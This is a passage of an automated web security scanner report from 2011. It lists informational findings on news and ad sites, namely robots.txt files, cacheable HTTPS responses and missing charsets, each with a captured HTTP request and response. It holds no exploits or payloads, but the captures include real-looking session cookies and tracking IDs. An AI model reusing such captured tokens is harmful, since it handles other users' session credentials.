Date: Mon, 09 May 2011 15:35:02 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 99
Last-Modified: Thu, 28 Apr 2011 16:54:16 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /httpstest.html
Disallow: /httpsokay.html
Disallow: /mcmd/
Disallow: /cmd/

22.60. http://www.natchezdemocrat.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.natchezdemocrat.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.natchezdemocrat.com

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 15:37:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: W3 Total Cache/0.9.1.1
X-Pingback: http://www.natchezdemocrat.com/xmlrpc.php
Set-Cookie: PHPSESSID=d16vlf5l6uc0pe36hli1cb0t80; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

22.61. http://www.npr.org/templates/reg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /templates/reg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.npr.org

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 21 Jul 2004 21:14:03 GMT
ETag: "ee-3dfc0e1ac1cc0"
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 20:09:42 GMT
Keep-Alive: timeout=10, max=4993
Content-Type: text/plain
Connection: close
Date: Mon, 09 May 2011 15:39:46 GMT
Age: 204
Content-Length: 238

User-agent: *
Disallow: /cgi-bin
Disallow: /ramfiles/
Disallow: /*.smil
Disallow: /*.asx
Disallow: /*.ram
Disallow: /*.rmm
Disallow: /*.js
Disallow: /*.au
Disallow: /stations/force/force_localization.
...[SNIP]...

22.62. http://www.tinbuadserv.com/v3/serve.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tinbuadserv.com
Path:   /v3/serve.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tinbuadserv.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:41 GMT
Server: Apache
Last-Modified: Wed, 17 Feb 2010 17:20:06 GMT
ETag: "16e8aab-86-47fcf0fbf5d80"
Accept-Ranges: bytes
Content-Length: 134
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# This robots.txt file requests search engines and other bots stay away and dont follow advertising links.
User-agent: *
Disallow: /

22.63. http://www.usatoday.com/weather/stormcenter/default.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /weather/stormcenter/default.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:43 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

23. Cacheable HTTPS response
There are 3 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


23.1. https://shop.npr.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.npr.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: shop.npr.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.7.10.1304955581; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:44:22 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Fri, 21 Dec 2020 00:00:00 GMT
Cache-Control: public, no-transform
Connection: close
Content-Type: text/plain
Content-Length: 318

..............(.......(....... ...............................................................................................................................    .......    .......    .......    .......    .......    .
...[SNIP]...

23.2. https://www.groupon.com/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

23.3. https://www.groupon.com/users/new

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users/new

Request

GET /users/new HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; NREUM=s=1304955348574; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.3.9.1304955341313; _chartbeat2=gzdl5mb0frlvfs2p; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:07 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:08 GMT; HttpOnly
Status: 200
ETag: "bac993c076753d5871cf9db400d8c856"
X-Runtime: 612
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36677

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

24. HTML does not specify charset
There are 27 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


24.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-38-58_13277019711304955538; expires=Sat, 07-May-2016 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_13277019711304955538; expires=Mon, 09-May-2011 15:53:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

24.2. http://480-adver-view.c3metrics.com/v.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Request

GET /v.js?id=adver&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1008
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3
...[SNIP]...

24.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7397
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:37:40 GMT
Expires: Mon, 09 May 2011 15:37:40 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

24.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7444
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:35:13 GMT
Expires: Mon, 09 May 2011 15:35:13 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

24.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5834
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:36:17 GMT
Expires: Mon, 09 May 2011 15:36:17 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

24.6. http://ad.doubleclick.net/pfadx/csmonitor_cim/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Request

GET /pfadx/csmonitor_cim/;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;ord=1304955298754? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;240052939;1-0;0;58826896;24/24;41597568/41615355/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;~cs=w
Date: Mon, 09 May 2011 15:35:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1217

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;240052939;1-0;0;58826896;24/24;41597568/41615355/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic1
...[SNIP]...

24.7. http://ads.bridgetrack.com/a/f/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:41 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
